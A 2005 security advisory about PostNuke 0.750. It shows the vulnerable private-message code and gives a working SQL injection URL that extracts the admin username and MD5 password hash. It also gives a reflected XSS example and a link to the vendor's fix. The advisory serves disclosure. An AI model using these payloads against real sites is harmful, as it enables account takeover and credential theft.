Critical SQL injection and XSS in PostNuke ( Research Advisory )

Advisory Text :

-=[ Critical SQL injection and XSS in PostNuke ]=-

Author: sp3x
Date: 27. May 2005

Affected software :
===================
PostNuke version : x=> 0.750

Description :
=============
PostNuke is an open source, open developement content management system
(CMS). PostNuke started as a fork from PHPNuke (http://www.phpnuke.org) and
provides many enhancements and improvements over the PHP-Nuke system.
PostNuke
is still undergoing development but a large number of core functions are
now
stabilising and a complete API for third-party developers is now in place.
If you would like to help develop this software, please visit our homepage
at http://noc.postnuke.com/
You can also visit us on our IRC Server irc.postnuke.com channel
#postnuke-support
#postnuke-chat
#postnuke
Or at the Community Forums located at:
http://forums.postnuke.com/

Vulnerabilities :
*****************

Critical SQL injection :
========================

Code :
------

/modules/Messages/readpmsg.php

=======================
$sql = "SELECT $column[msg_id] AS \"msg_id\",
$column[msg_image] AS \"msg_image\",
$column[subject] AS \"subject\",
$column[from_userid] AS \"from_userid\",
$column[to_userid] AS \"to_userid\",
$column[msg_time] AS \"msg_time\",
$column[msg_text] AS \"msg_text\",
$column[read_msg] AS \"read_msg\"
FROM $pntable[priv_msgs]
WHERE $column[to_userid]='" . (int)pnVarPrepForStore($userdata)
. "'";

$resultID =& $dbconn->SelectLimit($sql,1,$start);
if($dbconn->ErrorNo()<>0) {
error_log("DB Error: " . $dbconn->ErrorMsg());
echo $dbconn->ErrorMsg() . "<br />";
forumerror(0005);
}
=======================

First lets login -in as user in postnuke. Then send the message to
yourself.
After that go to :
http://[target]/[postnuke_dir]/modules.php?op=modload&name=Messages&file=re
adpmsg&start=0[SQL inj]&total_messages=1

Note :
------
total_messages=1 - the id of total_messages must exist

Now you will see this error message

error message :
---------------
========================
You have an error in your SQL syntax; check the manual that corresponds to
your MySQL server version for the right syntax to use near '[SQL
injection],1' at line 10
========================

Exploit SQL injection :
=======================

http://[target]/[postnuke_dir]/modules.php?op=modload&name=Messages&file=re
adpmsg&start=0%20UNION%20SELECT%20pn_uname,null,pn_uname,pn_pass,pn_pass,nu
ll,pn_pass,null%20FROM%20pn_users%20WHERE%20pn_uid=2/*&total_messages=1

And we can see the admin md5 password and nick :)

Cross-site scripting - XSS :
============================

Thanks to error message we can also perform XSS attacks :)

Example :
---------

http://[target]/[postnuke_dir]/modules.php?op=modload&name=Messages&file=re
adpmsg&start=0'<h1>cXIb8O3 and sp3x - SecurityReason</h1>&total_messages=1

And we get :

error message :
---------------
========================
You have an error in your SQL syntax; check the manual that corresponds to
your MySQL server version for the right syntax to use near ''[Our XSS],1'
at line 10
========================

How to fix :
============

PNSA 2005-2
Security Fix (changed files only) for PostNuke 0.750 (tar.gz format)
http://news.postnuke.com/Downloads-index-req-viewdownloaddetails-lid-471.ht
ml
SHA1: 6e76d92124c833618d02dfdb87d699374120967d
MD5: a007e741be11389a986b1d8928a6c0e5
Size: 160550 Bytes

or CVS

Greets :
========

cXIb8O3 and pkw :)

Contact :
=========

sp3x[at]securityreason[dot].com
www.securityreason.com

Security

IT News

Search

SecurityAlert Database

About SecurityAlert

ExploitAlert Database

SecurityReason Research

WLB Database

Send to WLB

About WLB

Security Audit

Schedule

Prices of services

Contact

SecurityReason IT News

SecurityAlert

World Laboratory of Bugtraq

ExploitAlert

Apache

PHP

Contact

About SecurityReason